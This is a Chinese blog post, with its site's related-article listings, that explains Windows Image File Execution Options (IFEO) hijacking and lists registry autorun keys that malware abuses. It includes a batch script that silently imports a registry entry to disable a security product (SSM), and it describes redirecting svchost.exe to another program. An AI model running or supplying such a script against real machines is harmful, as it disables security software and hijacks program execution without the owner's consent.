windows映像劫持技术(IFEO)介绍

最新推荐文章于 2023-05-08 15:25:19 发布
最新推荐文章于 2023-05-08 15:25:19 发布
阅读量533 收藏
点赞数
文章标签: windows file image system exe 活动
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lbq1221119/article/details/4606913
版权
QUOTE:
基本症状:可能有朋友遇到过这样的情况,一个正常的程序,无论把他放在哪个位置或者是重新用安装盘修复过的程序,都无法运行或者是比如运行A却成了执行B的程序了,而改名后却可以正常运行。。


既然我们是介绍IFEO技术相关,那我们就先介绍下:

一,什么是映像胁持(IFEO)?

所谓的IFEO就是Image File Execution Options

在是位于注册表的
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options

由于这个项主要是用来调试程序用的,对一般用户意义不大。默认是只有管理员和local system有权读写修改

先看看常规病毒等怎么修改注册表吧。。

那些病毒、蠕虫和,木马等仍然使用众所皆知并且过度使用的注册表键值,如下:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Windows/AppInit_DLLs
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/Notify
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnce
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/RunServicesOnce
等等。。。。。。。。。。。。。。。

二,具体使用资料:


@echo off   //关闭命令回显
echo 此批处理只作技巧介绍,请勿用于非法活动!//显示echo后的文字
pause   //停止
echo Windows Registry Editor Version 5.00>>ssm.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/syssafe.EXE] >>ssm.reg
echo "Debugger"="syssafe.EXE" >>ssm.reg   //把echo后的文字导出到SSM.reg中
regedit /s ssm.reg &del /q ssm.reg   //导入ssm.reg并删除

使SSM失效HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/svchost.exe项下的"Debugger"="abc.exe" 意思是不执行svchost.exe而执行abc.exe

使用这个方法,可以把特定的名称的exe文件的执行重定向。
lbq1221119
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
windows-API劫持(API-HOOK)
天使也掉毛
08-14 2万+
API劫持windows-API劫持(API-HOOK)
关于映像劫持
weixin_46661122的博客
11-30 6549
什么是映像劫持? “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助机制等。出于简化原因,IFEO使用忽略路径的方式
木马启动之映像劫持
最新发布
COSMOSJie的博客
05-08 379
木马运行的原理其实很简单
IFEO 映像文件劫持
aijuzhou1959的博客
04-04 325
映像劫持”,也被称为“IFEO”(Image File Execution Options) 映像劫持的根本就是被恶意篡改了注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options项。 比如如在这里新建一个子项notepad.exe,再在这子项里新建...
windows映像劫持技术
内核小菜的专栏
01-15 687
今天看windows创建进程的过程,第一个阶段怎么看都看明白,里面说要查看什么注册表,看看有debugger值什么的。后来查了下百度,原来就启动一个进程的一个小阶段被病毒广泛利用,也就是下面说的映像劫持技术。看来microsoft也有考虑不周的地方啊   ==========================================================window
windows映像劫持
jandroid
02-02 162
 基本症状:可能有朋友遇到过这样的情况,一个正常的程序,无论把它放在哪个位置,或者是一个程序重新用安装盘修复过,都出现无法运行的情况,或是出错提示为“找不到文件”或者直接没有运行起来的反应,或者是比如运行程序A却成了执行B(可能是病毒),而改名后却可以正常运行的现象。   遭遇流行“映像劫持”病毒的系统表现为常见的杀毒软件、防火墙、安全检测工具等均提示“找不到文件”或执行了没有反应,于是大部分用...
windows映像劫持技术IFEO
04-08
### Windows映像劫持技术IFEO) #### 一、什么是映像劫持IFEO)? 映像劫持(IFEO),全称Image File Execution Options,是一种原本设计用于调试目的的技术,但后来被黑客和恶意软件开发者利用进行攻击。IFEO...
映像劫持技术IFEO介绍以及解决方案
03-24
### 映像劫持技术IFEO):深入解析与防范策略 #### 一、映像劫持(IFEO)概述 映像劫持技术(IFEO),全称Image File Execution Options,是微软操作系统中的一项高级功能,最初设计目的是为了方便开发者进行程序的...
IFEO映像劫持恢复工具
05-07
IFEOImage File Execution Options)映像劫持是一种技术,主要用于调试或监控程序执行,但在恶意软件中也可能被滥用。IFEO允许在特定的可执行文件启动时,替代原本应该运行的进程,而运行一个指定的调试器或其他...
IFEO映像劫持修复程序.exe
03-18
IFEOImage File Execution Options)映像劫持Windows操作系统中的一种机制,它允许开发者调试或监控特定可执行文件的运行。然而,恶意软件有时会滥用这个功能来篡改正常程序的行为,导致安全问题。"IFEO映像劫持...
IFEO映像挟持修复程序
11-23
IFEOImage File Execution Options)映像挟持是Windows操作系统中一种高级调试技术,它允许开发者在特定可执行文件启动时插入一个调试器或其他辅助工具。然而,有时恶意软件会利用这一机制来劫持正常程序的执行...
(经典)详解WINDOWS映像劫持技术
yxyhack's blog
09-21 4821
一. 诡异的中毒现象在成品检验科文员办公室的一台电脑上折腾半个小时后,计算机维护部门的技术员只觉得眼皮不停狂跳,因为从刚开始接手这个任务开始,他就一直在做无用功:他随身带的U盘里引以为豪的众多维护工具包在这台机器上全军覆没,无论他直接在U盘上运行还是随便复制到哪个目录里,系统都是报告“找不到文件”或者直接没有运行起来的反应,他第一次感受到了恐惧,文件分明就好好的在眼皮底下,可它们就是“找不到”或死
映像胁持(IFEO技术详解
LXM13579929299的博客
05-21 267
为什么有人说我中毒了,连杀毒软件也不能用,(杀软也不是万能的,呵呵)到底为什么会这样,那是病毒的制造者利用映像胁持(IFEO)的技术。 一,什么是映像胁持(IFEO)? 所谓的IFEO就是Image File Execution Options 在是位于注册表的 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVer...
注册表映像劫持技术
nbedk_0812的专栏
01-06 2051
通常我们的自启动大多是通过注册表启动项,文件夹启动项,服务启动等,然而还有一种人们所不常见的自启动方法,他不同于文件关联启动,他却能劫持某一特定程序,以下解释来自百度百科:     “映像劫持”,也被称为“IFEO”(Image File Execution Options,其实应该称为“Image Hijack”,至少也应该称为IFEO Hijack而不是只有“IFEO”自身!),它的存在自然
高斯消元法求解线性方程组
AKe's blog
07-10 1843
local Solve = function(tAb) local Output = function() local print = print; for y=1,#tAb do print(table.concat(tAb[y],"\t")); end print(); end loca
映像劫持技术(IFEO)及其应用
AKe's blog
02-27 1093
映像劫持的定义    所谓的映像劫持IFEO)就是Image File Execution Options,位于注册表的HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options 由于这个项主要是用来调试程序用的,对一般用户意义不大。默认是只有管理员和local syst
映像劫持IFEO)的原理及实现
10-20 446
  映像劫持的根本原因就是被恶意程序篡改了注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 。   假如在这里新建一个子项notepad.exe,再在这子项里新建一个REG_SZ的名字为Debugger,内容为cmd.exe的值项。这样就会实现映...
映像劫持技术(2):实例
weixin_30484739的博客
01-01 57
Image File Execution Options下创建cmd.exe项,将其“重定向”到我们自己编写的程序 1 #include<stdio.h> 2 #include<windows.h> 3 4 int main() 5 { 6 HKEY hKey; 7 DWORD dwDisposition=REG_CREA...
IFEO 文件镜像劫持技术
04-04
IFEOImage File Execution Options)文件镜像劫持技术是一种Windows系统下的应用程序调试和监控机制。IFEO中的“Image File Execution Options”指的是Windows注册表中的一个键值,它可以让我们在应用程序运行前...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值